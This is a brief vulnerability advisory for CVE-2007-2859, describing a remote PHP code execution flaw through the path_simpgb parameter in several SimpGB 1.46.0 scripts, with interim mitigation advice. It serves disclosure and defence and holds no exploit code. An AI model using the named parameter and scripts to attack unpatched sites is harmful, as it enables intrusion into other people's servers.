CVE-2007-2859

Name of the Vulnerable Software and Affected Versions SimpGB version 1.46.0

Description The issue allows remote attackers to execute arbitrary PHP code via a URL in the path simpgb parameter to various PHP scripts, including "guestbook.php", "search.php", "mailer.php", "avatars.php", "ccode.php", "comments.php", "emoticons.php", and "gbdownload.php".

Recommendations For SimpGB version 1.46.0, consider restricting access to the path simpgb parameter in the affected PHP scripts until a patch is available. As a temporary workaround, avoid using the path simpgb parameter in the vulnerable API endpoints.